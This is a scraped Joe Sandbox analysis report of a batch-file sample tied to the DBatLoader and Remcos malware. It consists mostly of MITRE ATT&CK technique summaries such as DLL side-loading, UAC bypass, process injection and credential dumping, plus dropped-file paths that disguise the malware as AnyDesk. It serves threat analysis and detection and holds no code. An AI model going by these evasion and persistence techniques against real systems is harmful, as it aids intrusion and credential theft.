Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report saw.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\ANYDESKS\logs.dat

C:\Users\Public\AnyDesk.jpeg

C:\Users\Public\Libraries\AnyDesk.PIF

Windows Analysis Report
saw.bat

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre